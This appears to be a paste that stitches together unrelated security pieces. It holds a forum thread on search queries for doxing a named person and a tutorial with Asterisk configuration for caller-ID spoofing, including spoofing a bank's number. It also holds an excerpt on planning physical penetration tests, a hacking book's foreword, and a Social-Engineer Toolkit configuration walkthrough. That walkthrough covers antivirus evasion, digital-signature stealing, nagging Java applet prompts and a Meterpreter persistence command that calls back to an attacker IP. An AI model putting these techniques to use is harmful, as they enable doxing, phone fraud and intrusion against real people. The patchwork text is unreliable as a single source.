· 6 years ago · Aug 21, 2019, 08:22 PM
1
20x00sec - The Home of the Hacker
3Log In
4Gathering Sensitive Information: Advanced Search Queries
5Social Engineering
6socialengineering
7Merozey (Merozey) 2016-05-24 15:56:47 UTC #1
8
9**
10What Is Search Queries Again?
11
12**
13
14When you type something into Google, or whatever you are using, you for obvious reasons don’t get all the results on your search, because that would simply be way too much data for your computer to handle.
15hence: that is why Google have so many and such big servers - not fit for your laptop or desktop.
16
17Definition:
18A web search query is a query that a user enters into a web search engine to satisfy his or her information needs. - According to Wiki at least.
19
20That would be the ideal definition you’d get by asking a non-hacker. However, now lets imagine you asked Merozey, and see what you would get.
21
22Definition:
23By performing a search query in a database holding useful information, your query will go through the most popular databases potentially holding your answer, and will display that information accordingly, depending on its popularity.
24
25**
26Basics of Advanced Search Queries:
27
28**
29So, let me introduce to you a search query I use quite often actually, because it is very convenient, and provides good results. What I am introducing to you, is your new friend called A. He looks like this
30
31@
32
33This little fella can pull some good information in a short and sweet search query looking something like this:
34
35@MichaelOregon
36
37Remember our friend Michael that we are trying to DoX?
38What is the @ doing exactly?
39
40It narrows down your results tremendously, because as I mentioned above, your search query goes through hundreds of databases, and if you don’t put in @, you will receive everything that have either Michael or Oregon in it. therefore it is very effective to put in @, because it will look for specifically those 2 names TOGETHER. You will of course still get useless information, but that wont be whats being displayed to you at the top of your page. Usually (if done correctly) you should see potential social media profiles, and websites etc. first, and then useless information. Trust me, it will save you a lot of time.
41
42**
43Advanced Search Queries:
44
45**
46
47Now, lets move on to the big boy stuff. This is guaranteed that no average PC user is aware of this, because why would they? My other friend he is also very good at pulling some information when I am looking for specifically a certain thing.
48
49" "
50
51This guy right here can show you for example a spécific location. Lets say you are looking for Michael and you have heard rumours he might be living in USA but even more, he might be living near Pennsylvania. So one thing you could do is this:
52
53@MichaelOregon “Pennsylvania”
54
55This will display (hopefully) a Michael Oregon living in Pennsylvania with potential addresses.
56
57I will possibly make a #2 on Advanced Search Queries
58_gumby (Juan) 2016-05-24 16:04:34 UTC #2
59
60Good info! You’d be surprised how much info you can get on a target from advanced Google queries. For those interested in a book to train your Google-fu: http://www.amazon.com/Google-Hacking-Penetration-Testers-Johnny/dp/1597491764
61OilSlick 2016-05-24 16:10:56 UTC #3
62
63:thumbsup: Quality information for those unaware, should go through some advanced Google-Fu as it were, would be a solid foundational series.
64random-man (random-man) 2016-05-24 16:54:19 UTC #4
65
66Awesome. Thanks for the useful info.
67n3xUs 2016-05-24 21:55:05 UTC #5
68
69Great post! Really useful, I’d definetly like to see Advanced Search Queries #2. However, I do have one question, do these search queries only work with the Google search engine, or do they also work with Duckduckgo or Disconnect.me?
70Merozey (Merozey) 2016-05-25 13:15:15 UTC #6
71
72Essentially they should work on all search engines, the result will possibly vary from each search engine, since it your results are displayed accordingly depending on the databases Google uses to retrieve data.
73system (system) 2018-01-21 00:38:38 UTC #7
74
75This topic was automatically closed after 30 days. New replies are no longer allowed.
76Home Categories FAQ/Guidelines Terms of Service Privacy Policy
77
78Powered by Discourse, best viewed with JavaScript enabled
79Init Partners
80
81
82NFORMATION
83
84http://www.social-engineer.org/ - A free learning resource to Social Engineers, made by Social Engineers
85http://www.social-engineer.org/framework/general-discussion/ - More information on Social Engineering
86https://www.cybrary.it/ - A free learning platform for everything CyberSec
87https://www.cybrary.it/course/social-engineering/ - Link to the SE Course on Cybrary.it
88
89TOOLS
90
91http://www.social-engineer.org/framework/se-tools/ - A list of tools and capabilities necessary to the Social Engineer
92http://www.asterisk.org/ - VoIP Software (Allows Caller ID Spoofing after some configuration)
93http://social-engineer.org/wiki/archives/CallerIDspoofing/CallerID-SpoofingWithAsterisk.html - Tutorial on how to use Asterisk
94http://www.paterva.com/web7/ - Maltego
95http://www.social-engineer.org/framework/se-tools/computer-based/maltego/ - Overview of Maltego by SE point of view
96http://www.yasni.com/ - People Search Engine
97http://www.whitepages.com/name/Anywho-Anywhere - Another People Search Engine
98
99-----------------------------------
100
101
102Caller ID Spoofing w/ Asterisk
103
104Caller ID is often thought of as the ultimate way to see who is calling you. People use it to screen calls all the time. When you're able to spoof that number to whatever you would like you can easily defeat human nature of screening out calls from people they don't want to talk to. Besides being able to get in touch with those ignoring your calls it can be an attackers best friend. He or she can simply spoof your bank's number and social engineer you into giving out valuable information. The way people rely on caller ID it is unlikely the victim will realize what has happened until it is far too late.
105
106Hardware Used:
107
108 Intel P4 box with 1GB of RAM
109
110Software Used:
111
112 Ubuntu 7.10 Server
113 Asterisk
114 VMWare Workstation
115
116Prerequisites
117
118 VoIP service from companies like NuFone or VoicePulse which allow you to use your own PBX
119 Asterisk installed and able to run
120 Basic Linux knowledge
121
122Table of Contents
123
124 Introduction
125 Configuring Asterisk
126 Final Thoughts
127
128Introduction
129
130There are 3 main configuration files that need a bit of tweaking to get Asterisk working properly. These are iax.conf, sip.conf, and extensions.conf. The names pretty much tell you what each will be configuring. IAX is Inter-Asterisk Exchange and is the protocol used when connecting two Asterisk servers and is perfect for NAT transversal unlike the nightmare of SIP. SIP is the protocol that software based phones or hardware IP phones use to connect to the Asterisk box and extensions are what process call flow and routing. These configuration files all follow the standard "INI" file type where sections are denoted such as [section1] and variables under sections are declared simply with var=foo.
131
132Configuring Asterisk
133
134First thing we'll cover is setting up the connection to your VoIP provider. Most good providers will give you a sample iax configuration file that you can look over for specifics to your service but in most cases simple open up /etc/asterisk/iax.conf and add a few lines at the end as follows:
135
136[VoicePulse]
137type=peer
138host=server.example.voicepulse.com
139username=SomeuSer
140secret=PaSsWorD
141
142The first line there gives this connection a human readable name. The type tells Asterisk what type of connection this will be. Peer lets us know we will be sending calls through this connection. Host, username, and secret are all used to make the connection and authenticate. All of this should be given to you by your provider. As you can see this configuration is very basic and there are tons more options that can be done if this was going to be used in a production environment. The next file we need to edit is /etc/asterisk/sip.conf.
143
144[sipuser]
145type=peer
146host=dynamic
147username=allan
148secret=1234
149context=outgoing
150
151First line is again used to give the connection a name and type lets Asterisk know we can send calls to this connection and also make calls out. Setting host to dynamic ensures Asterisk keeps track of the IP/Hostname of the connection since it uses a dynamic IP. Username and secret are the username and password used to make the connection and context is used to simply tell Asterisk which context in the extension configuration to use. This lets Asterisk route the call as needed and be changed for each SIP user if you would like. The last configuration file for Asterisk is located in the same directory and named extension.conf. Open it up and add the following to the end:
152
153[outgoing]
154exten => _1NXXNXXXXXX,1,SetCallerID(2024561111)
155exten => _1NXXNXXXXXX,n,Dial(IAX2/VoicePulse/${EXTEN})
156
157Once again the first line is used to give a name to our settings. In this case it is called a context and that is what Asterisk uses to place calls based on your own rules. The next two lines will match any 1 + 10 digit US number. The N's and X's are basically just wild cards N matching any digit greater than 2 and X matching any at all. The 1 tells Asterisk to do that command first and the n is used to say "do this next" is basic terms. SetCallerID() is the key to spoofing caller ID. Here you can change the number to whatever you would like but most providers require a 10 digit number while others will let you even set your caller ID to numbers like 911. The next command is Dial() which is what we use to send off the call. The arguments used tell Asterisk to use the IAX2 protocol to our VoicePulse connection and to route the call to what we've dialed. ${EXTEN} is just a global variable used for the number dialed.
158
159Everything should now be setup correctly and ready to use. The only thing left to configure is your softphone or IP phone depending what you are using. This is specific to individual phones and out of the scope of my project but essentially you tell your phone to connect to your Asterisk server. Often times from experience softphones will refer to this as "releam" or "domain" depending what phone you use (I recommend X-Lite or Twinkle). Besides that it will just ask for your username and password which were setup in sip.conf.
160
161CID Spoofing In Action
162
163As you can see because of ANI it shows the owner of that number as well as the actual number. Sorry about the image quality I could not take a picture of my phone without it being blurry :( but you get the idea.
164
165Final Thoughts
166
167Caller ID spoofing is not illegal in anyway. You should however worry about committing fraud as there are tons of laws against that. The real use of caller ID spoofing is to just trick your friends and have some fun. Don't do anything stupid. This is just information I'm trying to spread in order to show people that you can't always trust what your caller ID says.
168
169-------------------------------------------
170
171
172Unauthorised Access
1732
174Planning Your Physical Penetration
175Tests
176The first casualty of war is the plan.
177unknown
178The goal of this chapter is to give you the knowledge to build the right
179team to carry out a physical penetration test. This is no small task; it
180involves assembling a team, designating appropriate roles, organizing
181preliminary research and being able to confidently plan the assignment
182from start to finish. There are also administrative and legal aspects to take
183into consideration. After the planning phase of the project is complete,
184your team members should know what is expected of them and, just as
185importantly, what to expect from the assignment. Work you put into the
186planning phase will be rewarded during execution.
187There is an old joke that ‘in theory, theory and practice are the same thing,
188but in practice they’re not’. Touch ´
189e. The important thing to remember
190during the planning phase is that nothing is, nor should be, set in
191stone. Your testing plan should be flexible enough to accommodate
192contingency arrangements should assumptions turn out to be incorrect
193or should circumstances you previously took for granted change. This
194chapter is drawn from my own experience planning physical penetration
195tests. My own methods have been tweaked over years of experience. You
196should draw from it or add to it as befits the individual requirements with
197your team.
198When putting together an engagement scenario, you must consider the
199potential risks your client faces and what benefit physical testing will
200provide to them. If you perform generic testing or just go through the
201motions, you are wasting everyone’s time and money. Consider this
202example: A high-end optics company wants a physical test performed
203on their European headquarters. The facility is large and employs several
20412
205PLANNING YOUR PHYSICAL PENETRATION TESTS
206hundred people (mainly sales, middle management and support person-
207nel). The site also houses the distribution warehouse for all products
208shipped to Europe, the Middle East and Africa. What is their primary risk?
209It’s not espionage: no research and development is performed at the site
210although, like all the company’s sites worldwide, it’s networked. This
211company makes cameras, scanners and lenses, which is not a controver-
212sial line of business per se; therefore, the risk of infiltration by journalists
213and activists is minimal. In this instance, the biggest concern is probably
214simple theft. As the company produces devices that cost many thousands
215of dollars and fit into a backpack, the warehouse would be a tempting
216target for thieves. This is not to say that the offices, staff and computer
217network should not be considered in a penetration test but you must
218identify the client’s risks as they relate to their business interests.
219The above notwithstanding, a lot of the time you won’t have much input
220into determining the target assets and will be heavily directed to the areas
221that the client wants tested. However you should not be shy in saying if
222you think any given scenario offers little real-world value and suggesting
223better alternatives. In the previous example, a testing team would have
224little difficulty in entering the target offices and taking photographs but
225would completely ignore the real issues. Risks vary between organizations
226but consider the examples in Table 2.1.
227Table 2.1
228Organization types and risks
229Business area
230Example risk
231Example scenario
232Central government or military Terrorist attack Smuggling a package into a secure area.
233Corporate headquarters
234Espionage
235Access to files or computer systems.
236Luxury car dealership
237Theft
238Removing assets.
239Building the Operating Team
240The operating team actually carries out the physical penetration and
241members can be divided into different roles with different responsibilities
242and areas of expertise. The team makeup will vary with each test as
243no two are alike; consequently, it is not enough to build one team and
244hope for the best. This must be done in the planning phase for every test.
245Financial and other practical considerations make it likely that these roles
246will overlap and team members will assume more than one role even
247within a single test.
248BUILDING THE OPERATING TEAM
24913
250Operator
251Operator is a generic term used to refer to a core member of the operating
252team. This term is used to refer to all team members regardless of
253their specialties or roles. The basic operator role is where everybody
254starts before training in a specialist field. Though all team members may
255accurately be referred to as operators, these are usually the people who
256directly participate in testing rather than in a support role. As I say, the
257term is generic and does not imply expertise in any given role.
258Team Leader
259This team member has the ultimate responsibility for delivering the
260assignment, managing the project and team members, liaising with the
261client, and so on. This role shouldn’t be permanent but cycled. This gives
262everyone leadership experience and encourages fresh approaches. The
263team leader usually leads the team in the field but sometimes this needs to
264be done from headquarters (HQ) where he takes the role of coordinator.
265It is not unusual to delegate the role of team leader to an operator in the
266field while retaining an HQ coordinator, as this gives you the best of both
267worlds.
268Coordinator or Planner
269The coordinator directs and assists team members from HQ or from
270another offsite location when the team leader is deployed with the main
271operating team. This member of the team ensures that offsite assistance
272(technical, legal, reference, social engineering, etc.) is always available.
273When direct offsite coordination of deployed operators is unnecessary,
274it is still usual to have someone in this role and absolutely critical if
275multiple vectors or teams are deployed simultaneously against the same
276target. A common example would be a physical test carried out in
277parallel with a computer-based intrusion, particularly when information
278from each team needs to be fed into the other; a successful computer
279intrusion may depend on information gathered on site and a successful
280physical intrusion may need ongoing remote intelligence or some form
281of electronic control.
282Social Engineer
283Social engineering is the art of deception and human manipulation, a
284critical skill to the success of the sort of engagement discussed in this
285book. The basics of social engineering are discussed in Chapter 4 but
28614
287PLANNING YOUR PHYSICAL PENETRATION TESTS
288expertise in this field cannot easily be taught; it is either natural or learned
289through experience.
290Social engineering is mostly performed off site and is an attack commonly
291performed prior to physical testing. That being said, all operators can be
292expected to perform some degree of social engineering while on site.
293Computer Intrusion Specialist
294This role is also referred to as the ‘ethical hacker’, a discipline in and of
295itself. The computer intrusion specia
296list is responsible for gaining access
297to computers and networks. In the context of a physical penetration
298test, this will usually (but not exclusively) be performed on site. The key
299targets in physical penetration testing are usually information systems,
300therefore it is unlikely you will have much long-term success unless
301your resources include people capable of this kind of work. Luckily, the
302computer-penetration testing industry is booming and this skill set is not
303hard to find.
304Physical Security Specialist
305This team member should be skilled in picking locks and in profiling
306and defeating physical security measures in general. Usually at least one
307member of the team should have rudimentary skills in this area. Picking
308locks is not difficult but it does take practice and a little luck. I cover
309everything you need to get started in Chapter 5 and refer to various bits
310of equipment that will make your life a little bit easier.
311Surveillance Specialist
312This team member is expected to be able to capture photos of buildings,
313staff, badges, dumpsters and perimeter security. Surveillance staff should
314obviously be skilled with a camera although this is only the most basic
315prerequisite. A surveillance operator is a core member of the team and
316must be capable of gathering evidence by covert means on foot, in a
317vehicle or by public transport. Covert photography is discussed in Chapter
3186 and expands a little on these themes.
319Assigning Roles to Team Members
320The roles in the previous sections do not describe individual team
321members but specialist skill sets – the roles that any given team member
322may be asked to assume in the execution of a test. Only the largest
323PROJECT PLANNING AND WORKFLOW
32415
325testing groups will be able to deploy operating team roles at this level of
326resolution. Even then, doing so is neither cost effective nor operationally
327efficient.
328Efficiency demands that individual team members adopt multiple areas
329of responsibility. For example, information gathering is not listed as a
330specialist skill set. This is something that every team member will have
331to contribute to throughout the test and, given the numerous disciplines
332this encompasses, it cannot be considered ‘specialist’ per se.
333Some equipment is standard on all assignments; some is not required;
334much is optional. The overall nature of the test and the roles a particular
335team member has been assigned should determine the equipment you
336allocate to team members. A comprehensive discussion of kit can be
337found in Chapter 8.
338The very definition of a team means that individual team members will
339have different skill sets and will be naturally predisposed towards certain
340roles. Allocating an ethical hacker to a social-engineering role is not just
341a waste of resources but demonstrates a lack of understanding of the
342qualities that make up a good social engineer. They are not necessarily
343compatible with the nature of an ethical hacker. In principle at least,
344anyone can learn and become skilled at ethical hacking, photography,
345or lock picking. Social engineering requires a certain kind of personal-
346ity: confident, extroverted, and generally good with people. This is not
347something in which one can become accredited. On the other hand, the
348abilities of a computer intrusion specialist may not be immediately appar-
349ent to somebody inexperienced in ethical hacking. Therefore practitioners
350must either have demonstrable experience in the field or possess base-
351line accreditation (the former being preferable). Security accreditation is
352discussed in the appendices.
353I strongly advise that when putting together a team you include only your
354own staff members. Using contractors is not recommended for operational
355and legal reasons. Think about this from the perspective of your client
356who might object to you bringing in third parties who may be unknown
357to you and whose credentials may be harder to verify.
358Project Planning and Workflow
359As you plan your project, create a workflow to be sure that you cover all
360aspects of the assignment. The workflow in Figure 2.1 shows the stages,
361more or less, that any physical test will follow. Although vague, the chart
36216
363PLANNING YOUR PHYSICAL PENETRATION TESTS
364Receive
365Engagement
366Negotiate Rules
367of Engagement
368Allocate
369Preliminary
370Roles
371Information
372Gathering
373Photographic
374Surveillance
375Reappraise
376Roles
377Social
378Engineering
379Execute
380Assignment
381Write Report
382Perform
383Preliminary
384Research
385Determine Risk
386Determine
387Equipment
388Write Test Plan
389Complete
390Documentation
391Requirements
392Figure 2.1
393A physical test workflow.
394
395
396
397How to Hack Like
398a Pornstar
399Master the secrets of hacking
400through real-life hacking
401scenarios
402Copyright © 2017 Sparc FLOW
403All rights reserved. No part of this publication may be
404reproduced, distributed, or transmitted in any form or by
405any means, including photocopying, recording, or other
406electronic or mechanical methods, without the prior
407written permission of the publisher, except in the case of
408brief quotations embodied in critical reviews and certain
409other noncommercial uses permitted by copyright law.
410ISBN
411 978-1-5204-7851-7
412Foreword
413This is not a book about information security.
414Certainly not about IT. This is a book about hacking:
415specifically, how to infiltrate a company’s network,
416locate their most critical data, and make off with it
417without triggering whatever shiny new security tool the
418company wasted their budget on.
419Whether you are a wannabe ethical hacker or just an
420enthusiast frustrated by outdated books and false media
421reports, this book is definitely for you.
422We will set up a fake – but realistic enough – target
423and go in detail over the main steps to 0wn the company:
424building phishing malware, finding vulnerabilities,
425rooting Windows domains, p0wning mainframes, etc.
426I have documented almost every tool and custom
427script used in this book. I strongly encourage you to test
428them and master their capabilities (and limitations) in an
429environment you control and own. Given the nature of this
430book, it is ludicrous to expect it to cover each and every
431hacking technique imaginable, though I will try my best to
432give as many examples as I can while staying true to the
433stated purpose of the book.
434The brain behind SET is the configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
435
436root@bt:/pentest/exploits/set# ./set-update
437
438U src/payloads/set_payloads/http_shell.py
439
440U src/payloads/set_payloads/shell.py
441
442U src/payloads/set_payloads/shell.windows
443
444U src/payloads/set_payloads/set_http_server.py
445
446U src/payloads/set_payloads/persistence.py
447
448U src/payloads/set_payloads/listener.py
449
450U src/qrcode/qrgenerator.py
451
452U modules/ratte_module.py
453
454U modules/ratte_only_module.py
455
456U set-automate
457
458U set-proxy
459
460U set
461
462U set-update
463
464U readme/LICENSE
465
466U readme/CHANGES
467
468root@bt:/pentest/exploits/set#
469
470Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:
471
472root@bt:/pentest/exploits/set# nano config/set_config
473
474# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
475
476METASPLOIT_PATH=/pentest/exploits/framework3
477
478Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.
479
480# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
481
482# EXAMPLE: ETTERCAP_INTERFACE=wlan0
483
484ETTERCAP_INTERFACE=eth0
485
486#
487
488# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
489
490ETTERCAP_PATH=/usr/share/ettercap
491
492The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.
493
494# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
495
496SENDMAIL=OFF
497
498Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is installed by default.
499
500# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
501
502WEBATTACK_EMAIL=OFF
503
504When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.
505
506# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
507
508# INSTALL —> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
509
510# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
511
512SELF_SIGNED_APPLET=OFF
513
514The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).
515
516# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFE$
517
518# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
519
520JAVA_ID_PARAM=Secure Java Applet
521
522#
523
524# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA AP$
525
526# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. T$
527
528# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
529
530JAVA_REPEATER=ON
531
532When a user gets the java applet warning, they will see the ‘Secure Java Applet’ as the name of the Applet instead of the IP address. This adds a better believability to the java applet. The second option will prompt the user over and over with nagging Java Applet warnings if they hit cancel. This is useful when the user clicks cancel and the attack would be rendered useless, instead it will continue to pop up over and over.
533
534# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
535
536# SET TO AUTODETECT YOUR INTERFACE
537
538AUTO_DETECT=ON
539
540The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.
541
542# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
543
544# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
545
546WEB_PORT=80
547
548By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.
549
550# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
551
552# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
553
554# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
555
556CUSTOM_EXE=src/exe/legit.binary
557
558When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.
559
560# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
561
562# THE ATTACK VECTOR
563
564APACHE_SERVER=OFF
565
566#
567
568# PATH TO THE APACHE WEBROOT
569
570APACHE_DIRECTORY=/var/www
571
572The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.
573
574# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
575
576WEBATTACK_SSL=OFF
577
578#
579
580# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
581
582# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
583
584# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
585
586#
587
588SELF_SIGNED_CERT=OFF
589
590#
591
592# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
593
594# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
595
596PEM_CLIENT=/root/newcert.pem
597
598PEM_SERVER=/root/newreq.pem
599
600In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.
601
602TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
603
604# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
605
606WEBJACKING_TIME=2000
607
608The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.
609
610 # PORT FOR THE COMMAND CENTER
611
612COMMAND_CENTER_PORT=44444
613
614#
615
616# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
617
618# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
619
620COMMAND_CENTER_INTERFACE=127.0.0.1
621
622#
623
624# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLO$
625
626ENCOUNT=4
627
628The command center is the web GUI interface for the Social-Engineer Toolkit. If you want to use this on a different port, change this number. The next option will specify what interface to listen on for the SET web interface. If it’s set to 127.0.0.1, it eans that no one from outside on the network can hit the web interface. If you place it to 0.0.0.0, it will bind to all interfaces and it can be reached remotely. Be careful with this setting. The encount flag determines how many times a payload will be encoded with Metasploit payloads when in SET. By default it’s 4, but if you require less or more, you can adjust this accordingly.
629
630# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
631
632# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
633
634# THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
635
636AUTO_MIGRATE=OFF
637
638The AUTO_MIGRATE feature will automatically migrate to notepad.exe when a meterpreter shell is spawned. This is especially useful when using browser exploits as it will terminate the session if the browser is closed when using an exploit.
639
640# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
641
642# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
643
644# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
645
646DIGITAL_SIGNATURE_STEAL=ON
647
648The digital signature stealing method requires the python module called PEFILE which uses a technique used in Disitool by Didier Stevens by taking the digital certificate signed by Microsoft and importing it into a malicious executable. A lot of times this will give better anti-virus detection.
649
650# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
651
652# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
653
654UPX_ENCODE=ON
655
656UPX_PATH=/pentest/database/sqlmap/lib/contrib/upx/linux/upx
657
658In addition to digital signature stealing, you can do additional packing by using UPX. This is installed by default on Back|Track linux, if this is set to ON and it does not find it, it will still continue but disable the UPX packing.
659
660# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
661
662# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
663
664# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
665
666# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ;
667
668METERPRETER_MULTI_SCRIPT=OFF
669
670#
671
672# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
673
674# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO
675
676# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
677
678METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
679
680The next options can configure once a meterpreter session has been established, what types of commands to automatically run. This would be useful if your getting multiple shells and want to execute specific commands to extract information on the system.
681
682# THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
683
684# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
685
686# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
687
688# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
689
690UNC_EMBED=OFF
691
692#
693
694This will automatically embed a UNC path into the web application, when the victim connects to your site, it will try connecting to the server via a file share. When that occurs a challenge response happens and the challenge/responses can be captured and used for attacking.
695SET Menu’s
696
697SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.
698
699root@bt:/pentest/exploits/set# ./set
700
701 _______________________________
702
703 / _____/\_ _____/\__ ___/
704
705 \_____ \ | __)_ | |
706
707 / \ | \ | |
708
709 /_______ //_______ / |____|
710
711 \/ \/
712
713 [—] The Social-Engineer Toolkit (SET) [—]
714
715 [—] Created by: David Kennedy (ReL1K) [—]
716
717 [—] Development Team: JR DePre (pr1me) [—]
718
719 [—] Development Team: Joey Furr (j0fer) [—]
720
721 [—] Development Team: Thomas Werth [—]
722
723 [—] Development Team: Garland [—]
724
725[—] Report bugs: davek@trustedsec.com [—]
726
727 [—] Follow me on Twitter: dave_rel1k [—]
728
729 [—] Homepage: https://www.trustedsec.com [—]
730
731 Welcome to the Social-Engineer Toolkit (SET). Your one
732
733 stop shop for all of your social-engineering needs..
734
735 Join us on irc.freenode.net in channel #setoolkit
736
737 The Social-Engineer Toolkit is a product of TrustedSec.
738
739 Visit: https://www.trustedsec.com
740
741 Select from the menu:
742
743 1) Spear-Phishing Attack Vectors
744
745 2) Website Attack Vectors
746
